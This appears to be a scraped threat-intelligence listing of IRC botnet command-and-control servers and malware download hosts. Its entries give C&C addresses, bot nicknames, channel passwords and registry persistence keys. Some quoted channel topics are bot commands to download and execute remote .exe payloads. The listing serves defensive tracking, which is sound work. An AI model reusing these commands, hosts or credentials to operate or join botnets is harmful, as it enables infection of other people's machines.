bean.F-QACS.INFO:5337 178.162.175.63:5337 Nick: [NEW][USA]72014 Username: [NEW][USA]72014 Joined Channel: #ed HKU​S-1-5-21-842925246-1425521274-308236825-500​SOFTWARE​MICROSOFT​WINDOWS​CURRENTVERSION​RUN Windows Service Host C:Documents and SettingsAdministratorApplication Datasvchost.exe infos about hosting: http://whois.domaintools.com/178.162.175.63
a.botsgod.info(VirUs aka lamer botnet hosted in France Gandi)
a.botsgod.info 4949 ##A## Topic is ‘!j #1,#2’ Set by XxX on Wed Dec 22 07:14:52 * Topic is ‘!NAZEL http://dvdmediaplus.in/install.48755.exe s9d8y5.exe 1’ Set by xXx on Wed Dec 22 20:03:17 Topic is ‘!NAZEL http://promofile.info/setup715.exe SDSDSD.exe 1’ Set by XxX on Wed Dec 22 07:18:12 a.botsgod.info ip: 95.142.173.4 a.botsgod.info ip: 95.142.173.176 infos about hosting: http://whois.domaintools.com/95.142.173.4
aaaaaaaa.schooluni.us(buterfly bot hosted in Russian Federation Vline Ltd)
aaaaaaaa.schooluni.us:7196 PASS laorosr Channel#dpi Channel#! NICK [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #! Topic is ‘.asc -S|.http http://61.136.59.34/mobi.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’ Set by nonSTOPspread66 on SatRead more...
serv01.colo.owned.hu(botnet hosted with Egypt Afrinic)
Remote Host Port Number 196.46.191.100 31092 212.97.132.151 80 95.211.84.41 80 NICK US|computername USER duiizaui UNIX UNIX :username JOIN #all# JOIN #US Now talking in #all# Topic On: [ #all# ] [ zg8w2CSUq2uia0QJlZCB54+bx1ORaIYwuWdNWqLiaRItRqdzrOHaoL/ZlA/RBgykhuYXvz0p+UCC5AowzlgNggVoLqkXzM+L2HR5WjCPVOsWHS21OdGLfnuALxORajUP/gdM/hRbMXB+mBM995oqart5JdolC5OI ] Modes On: [ #all# ] [ +smntMu ] Resolved : [serv01.colo.owned.hu] To [83.15.2.2] Resolved : [serv01.colo.owned.hu] To [83.233.167.103] Resolved : [serv01.colo.owned.hu] ToRead more...
adpool-3.net(malware hosted with hosting.ua)
DNS Lookup Host Name IP Address www.microsoft.com 65.55.12.249 dell-d3e62f7e26 10.1.7.2 10.1.1.1 10.1.1.1 wpad adpool-3.net adpool-3.net 178.86.0.144 UDP Connections Opened listening TCP connection on port: 1515 Opened listening TCP connection on port: 6135Download URLs http://178.86.0.144/cgi-bin/npr/web/t_riz.cgi?magic=151561350006&ox=2-5-1-2600&tm=60&id=-1&cache=0880350166 (adpool-3.net) Outgoing connection to remote server: www.microsoft.com port 80 Outgoing connection to remote server: adpool-3.net TCP port 80 Registry Changes byRead more...
rolando9.clanhosters.org(malware hosted with United States Dallas Theplanet.com Internet Services Inc)
DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.14.2 10.1.1.1 10.1.1.1 wpad stuypel.free.bg stuypel.free.bg 188.40.80.188 rolando9.clanhosters.org rolando9.clanhosters.org 174.121.1.58 sharo.fileave.com sharo.fileave.com 64.62.181.43 Opened listening TCP connection on port: 12380Download URLs http://188.40.80.188/Thumbsx.db (stuypel.free.bg) http://64.62.181.43/0234254.exe (sharo.fileave.com) Outgoing connection to remote server: stuypel.free.bg TCP port 80 Outgoing connection to remote server: rolando9.clanhosters.org TCP port 80 Outgoing connection to remote server:Read more...
synyoshi.dyndns.info(botnet hosted with United States Walnut Psychz Networks)
– DNS Queries: Name Query Type Query Result Successful Protocol synyoshi.dyndns.info DNS_TYPE_A 173.224.219.21 YES udp 173.224.219.21:6667 Nick: n[XP-AUT]176146 Username: 8977 Joined Channel: #ganja# Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Update System” = C:Dokumente und EinstellungenAdministratorAnwendungsdatentaskeng.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows Update System” = C:Dokumente und EinstellungenAdministratorAnwendungsdatentaskeng.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “Windows Update System” = C:Dokumente undRead more...
fri.dyndns.info(botnet hosted with Germany Hetzner Online Ag)
DNS Lookup Host Name IP Address fri.dyndns.info 46.4.176.150 C&C Server: 46.4.176.150:6969 Server Password: Username: jukgljeclylnne Nickname: [DEU|XP|ilpqsde] Channel: #|fear|# (Password: ) Channeltopic: infos about hosting: http://whois.domaintools.com/46.4.176.150
76f.no-ip.biz(malware hosted with
DNS Lookup Host Name IP Address 76f.no-ip.biz 173.0.3.196 api.ipinfodb.com 67.212.74.82 Download URLs http://67.212.74.82/v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off (api.ipinfodb.com) Outgoing connection to remote server: 76f.no-ip.biz port 3333 Outgoing connection to remote server: api.ipinfodb.com TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareVB and VBA Program SettingsSrvIDID “UMUZZPIO31” = Spread HKEY_CURRENT_USERSoftwareVB and VBA Program SettingsINSTALLDATE “UMUZZPIO31” =Read more...
saud.markaz-royal.net(botnet hosted with Germany Hetzner Online Ag)
– DNS Queries: Name Query Type Query Result Successful Protocol saud.markaz-royal.net DNS_TYPE_A 46.4.176.169 YES udp 46.4.176.169:7493 Nick: {N}|AUT|XP|pc5|971512 Username: betqyd Server Pass: (null) Joined Channel: #null# Private Message to Channel #null#: “New Servant.” infos about hosting: http://whois.domaintools.com/46.4.176.169